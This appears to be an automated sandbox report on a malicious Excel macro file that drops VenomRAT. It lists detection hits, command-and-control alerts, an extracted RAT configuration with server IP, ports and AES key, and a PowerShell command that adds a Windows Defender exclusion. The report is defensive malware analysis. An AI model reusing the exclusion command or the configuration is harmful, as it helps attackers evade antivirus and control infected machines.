                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe", ParentImage: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe, ParentProcessId: 5140, ParentProcessName: newpoveno.exe, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", ProcessId: 5932, ProcessName: powershell.exe
                            Sigma detected: Suspicious Office Outbound Connections
                            Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DesusertionIp: 192.168.2.9, DesusertionIsIpv6: false, DesusertionPort: 49693, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6328, Protocol: tcp, SourceIp: 149.137.136.16, SourceIsIpv6: false, SourcePort: 443
                            Sigma detected: Non Interactive PowerShell Process Spawned
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe", ParentImage: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe, ParentProcessId: 5140, ParentProcessName: newpoveno.exe, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", ProcessId: 5932, ProcessName: powershell.exe
                            Sigma detected: Office Macro File Creation
                            Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ProcessId: 6328, TargetFilename: C:\Users\user\Desktop\~$Document25.xlsm
                            Sigma detected: Windows Processes Suspicious Parent Directory
                            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc, CommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 616, ProcessCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc, ProcessId: 656, ProcessName: svchost.exe

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-03-13T10:44:27.292321+010020283713Unknown Traffic192.168.2.94970513.107.246.60443TCP
                            2025-03-13T10:44:35.088778+010020283713Unknown Traffic192.168.2.94970713.107.246.60443TCP
                            2025-03-13T10:44:35.133374+010020283713Unknown Traffic192.168.2.94970813.107.246.60443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-03-13T10:49:08.683789+010020296061Malware Command and Control Activity Detected192.168.2.949720176.65.142.744448TCP
                            2025-03-13T10:49:15.203649+010020296061Malware Command and Control Activity Detected192.168.2.949720176.65.142.744448TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-03-13T10:43:50.239485+010020522671Domain Observed Used for C2 Detected176.65.142.744449192.168.2.949702TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-03-13T10:43:50.239485+010028424781Malware Command and Control Activity Detected176.65.142.744449192.168.2.949702TCP
                            2025-03-13T10:47:08.502623+010028424781Malware Command and Control Activity Detected176.65.142.744449192.168.2.949709TCP
                            2025-03-13T10:48:30.637010+010028424781Malware Command and Control Activity Detected176.65.142.744449192.168.2.949712TCP
                            2025-03-13T10:51:38.706091+010028424781Malware Command and Control Activity Detected176.65.142.744449192.168.2.949872TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Found malware configuration
                            Source: 0000001B.00000002.1457296209.0000024B54800000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: AsyncRAT {"Server": "176.65.142.74", "Ports": "4449,4448", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.3", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "oyLTzCYJW2NXzjfLQfeGJ9SMmgKS3lF7", "Mutex": "daqyvsbasipyrpcr", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "ServerSignature": "d+a4ycumaeWIM9YxlrFIdWs7CTkTxKdsBYh1mZeXMQ4o/CbIHyvL91xcA8PbMAiJqqCtkM59EmwfO4NFhG7G7IIF0QmqMnS+5KOeDimqGHuuXsBHBuWY5Zix0FWkhiFiwfy3w7kXQW8UC3JzN7wC8CGnoIBfAYhd9GU5l95HDAk=", "BDOS": "null", "External_config_on_Pastebin": "false"}
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpackMalware Configuration Extractor: VenomRAT {"Host": ["176.65.142.74"], "Port": ["4449", "4448"], "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.3", "Install": "false", "Mutex": "daqyvsbasipyrpcr", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "Server Signature": "d+a4ycumaeWIM9YxlrFIdWs7CTkTxKdsBYh1mZeXMQ4o/CbIHyvL91xcA8PbMAiJqqCtkM59EmwfO4NFhG7G7IIF0QmqMnS+5KOeDimqGHuuXsBHBuWY5Zix0FWkhiFiwfy3w7kXQW8UC3JzN7wC8CGnoIBfAYhd9GU5l95HDAk="}
                            Multi AV Scanner detection for submitted file
                            Source: Document25.xlsmVirustotal: Detection: 33%Perma Link
                            Source: Document25.xlsmReversingLabs: Detection: 18%
                            Sample uses string decryption to hide its real strings
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpackString decryptor: 4449,4448
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpackString decryptor: 176.65.142.74
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpackString decryptor: Venom RAT + HVNC + Stealer + Grabber v6.0.3
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpackString decryptor: false
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpackString decryptor: daqyvsbasipyrpcr
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpackString decryptor: MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpackString decryptor: d+a4ycumaeWIM9YxlrFIdWs7CTkTxKdsBYh1mZeXMQ4o/CbIHyvL91xcA8PbMAiJqqCtkM59EmwfO4NFhG7G7IIF0QmqMnS+5KOeDimqGHuuXsBHBuWY5Zix0FWkhiFiwfy3w7kXQW8UC3JzN7wC8CGnoIBfAYhd9GU5l95HDAk=
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpackString decryptor: null
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpackString decryptor: false
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpackString decryptor: Default
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpackString decryptor: false
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpackString decryptor: false

                            Phishing

                            barindex
                            AI detected landing page (webpage, office document or email)
                            Source: Screenshot id: 4Joe Sandbox AI: Screenshot id: 4 contains prominent button: 'view document'
                            Source: Screenshot id: 5Joe Sandbox AI: Screenshot id: 5 contains prominent button: 'view document'
                            Source: Screenshot id: 3Joe Sandbox AI: Screenshot id: 3 contains prominent button: 'view document'
                            Source: Screenshot id: 2Joe Sandbox AI: Screenshot id: 2 contains prominent button: 'view document'
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                            Source: unknownHTTPS traffic detected: 149.137.136.16:443 -> 192.168.2.9:49693 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.9:49705 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.9:49874 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 151.101.129.91:443 -> 192.168.2.9:49875 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.9:49876 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.9:49879 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.9:49880 version: TLS 1.2
                            Source: Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Client.pdb source: ScreenConnect.ClientService.exe, 0000002D.00000002.6315760555.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: Document.exe, 00000025.00000002.4296042211.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000756000.00000002.00000001.01000000.00000011.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: ntkrnlmp.pdb source: svchost.exe, 00000010.00000003.6134213228.000002CA01C90000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: Document.exe, 00000025.00000002.4296042211.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000756000.00000002.00000001.01000000.00000011.sdmp
                            Source: Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Core.PDB source: ScreenConnect.ClientService.exe, 0000002D.00000002.6315760555.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: winload_prod.pdb' source: svchost.exe, 00000010.00000003.6134213228.000002CA01C90000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Client.pdb0$4 source: ScreenConnect.ClientService.exe, 0000002D.00000002.6315760555.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: Document.exe, 00000025.00000000.4208849320.0000000000756000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4293631589.0000000005500000.00000004.08000000.00040000.00000000.sdmp, rundll32.exe, 00000029.00000003.4239690523.0000000004DB8000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6405133374.0000000004D3C000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6366331058.000000001BAB2000.00000002.00000001.01000000.00000019.sdmp
                            Source: Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Client.PDB source: ScreenConnect.ClientService.exe, 0000002D.00000002.6315760555.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 0000002D.00000002.6333087252.0000000001E72000.00000002.00000001.01000000.00000018.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6329378162.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6327680600.0000000002CD0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4235339870.0000000002E90000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000002D.00000000.4266258398.000000000081D000.00000002.00000001.01000000.00000017.sdmp
                            Source: Binary string: mscorlib.pdb source: ScreenConnect.ClientService.exe, 0000002D.00000002.6405133374.0000000004D3C000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: Document.exe, 00000025.00000002.4248031265.000000000406D000.00000004.00000800.00020000.00000000.sdmp, Document.exe, 00000025.00000002.4296285656.00000000055D0000.00000004.08000000.00040000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000756000.00000002.00000001.01000000.00000011.sdmp, rundll32.exe, 00000029.00000003.4239690523.0000000004D3D000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6375014970.000000001BCF2000.00000002.00000001.01000000.0000001A.sdmp
                            Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000029.00000003.4243485948.0000000004B30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000029.00000003.4239690523.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000010.00000003.6134213228.000002CA01C90000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000029.00000003.4239690523.0000000004D3D000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: Document.exe, 00000025.00000002.4248031265.000000000406D000.00000004.00000800.00020000.00000000.sdmp, Document.exe, 00000025.00000002.4296285656.00000000055D0000.00000004.08000000.00040000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000756000.00000002.00000001.01000000.00000011.sdmp, rundll32.exe, 00000029.00000003.4239690523.0000000004D3D000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6375014970.000000001BCF2000.00000002.00000001.01000000.0000001A.sdmp
                            Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000002E.00000000.4279525006.0000000000BB2000.00000002.00000001.01000000.0000001C.sdmp
                            Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: Document.exe, 00000025.00000000.4208849320.0000000000B51000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.0000000005946000.00000004.08000000.00040000.00000000.sdmp, Document.exe, 00000025.00000002.4248031265.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Document.exe, 00000025.00000002.4327567013.0000000007794000.00000004.00000800.00020000.00000000.sdmp, Document.exe, 00000025.00000002.4248031265.000000000432C000.00000004.00000800.00020000.00000000.sdmp, 3dc3b4.msi.39.dr
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.ClientService.exe, 0000002D.00000002.6405133374.0000000004D3C000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6326836605.0000000002C92000.00000002.00000001.01000000.0000001B.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 0000002E.00000000.4279525006.0000000000BB2000.00000002.00000001.01000000.0000001C.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.ClientService.exe, 0000002D.00000002.6405133374.0000000004D3C000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6326836605.0000000002C92000.00000002.00000001.01000000.0000001B.sdmp
                            Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: Document.exe, 00000025.00000000.4208691924.000000000074D000.00000002.00000001.01000000.00000011.sdmp
                            Source: C:\Windows\System32\msiexec.exeFile opened: z:
                            Source: C:\Windows\System32\msiexec.exeFile opened: x:
                            Source: C:\Windows\System32\msiexec.exeFile opened: v:
                            Source: C:\Windows\System32\msiexec.exeFile opened: t:
                            Source: C:\Windows\System32\msiexec.exeFile opened: r:
                            Source: C:\Windows\System32\msiexec.exeFile opened: p:
                            Source: C:\Windows\System32\msiexec.exeFile opened: n:
                            Source: C:\Windows\System32\msiexec.exeFile opened: l:
                            Source: C:\Windows\System32\msiexec.exeFile opened: j:
                            Source: C:\Windows\System32\msiexec.exeFile opened: h:
                            Source: C:\Windows\System32\msiexec.exeFile opened: f:
                            Source: C:\Windows\System32\svchost.exeFile opened: d:
                            Source: C:\Windows\System32\msiexec.exeFile opened: b:
                            Source: C:\Windows\System32\msiexec.exeFile opened: y:
                            Source: C:\Windows\System32\msiexec.exeFile opened: w:
                            Source: C:\Windows\System32\msiexec.exeFile opened: u:
                            Source: C:\Windows\System32\msiexec.exeFile opened: s:
                            Source: C:\Windows\System32\msiexec.exeFile opened: q:
                            Source: C:\Windows\System32\msiexec.exeFile opened: o:
                            Source: C:\Windows\System32\msiexec.exeFile opened: m:
                            Source: C:\Windows\System32\msiexec.exeFile opened: k:
                            Source: C:\Windows\System32\msiexec.exeFile opened: i:
                            Source: C:\Windows\System32\msiexec.exeFile opened: g:
                            Source: C:\Windows\System32\msiexec.exeFile opened: e:
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile opened: c:
                            Source: C:\Windows\System32\msiexec.exeFile opened: a:

                            Software Vulnerabilities

                            barindex
                            Document exploit detected (process start blacklist hit)
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Program Files\7-Zip\7z.exe
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then mov eax, dword ptr [rcx]8_2_00007FF727F87400
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then mov eax, dword ptr [rsi]8_2_00007FF727F89890
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then sub rsp, 28h8_2_00007FFA209A64E0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then sub rsp, 28h8_2_00007FFA209A64E0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then sub rsp, 28h8_2_00007FFA209A64E0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then sub rsp, 28h8_2_00007FFA209A64E0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then sub rsp, 28h8_2_00007FFA209A64E0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push rdi8_2_00007FFA209A64E0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then dec eax8_2_00007FFA20D79B00
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then dec eax8_2_00007FFA20E64120
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then xor eax, eax8_2_00007FFA20D7A2E0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then dec eax8_2_00007FFA20DA90F0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push esi8_2_00007FFA20DA90F0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push ebx8_2_00007FFA20DA90F0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push ebx8_2_00007FFA20DA90F0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push esi8_2_00007FFA20DA94C0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push ebx8_2_00007FFA20DA94C0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push ebx8_2_00007FFA20DA94C0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push ebx8_2_00007FFA20DFF720
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push esi8_2_00007FFA20DA9850
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push ebx8_2_00007FFA20DA9850
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then dec eax8_2_00007FFA20DA9850
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push ebx8_2_00007FFA20DA9940
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push ebx8_2_00007FFA20DA9940
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push ebx8_2_00007FFA20DA9940
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push esi8_2_00007FFA20DA9A80
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push ebp8_2_00007FFA20F67BE0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push edi8_2_00007FFA20DA9B40
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push edi8_2_00007FFA20DA9C00
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then mov eax, dword ptr [rcx]22_2_00007FF6CFFB7400
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then mov eax, dword ptr [rsi]22_2_00007FF6CFFB9890
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then sub rsp, 28h22_2_00007FFA164264E0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then sub rsp, 28h22_2_00007FFA164264E0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then sub rsp, 28h22_2_00007FFA164264E0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then sub rsp, 28h22_2_00007FFA164264E0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then sub rsp, 28h22_2_00007FFA164264E0
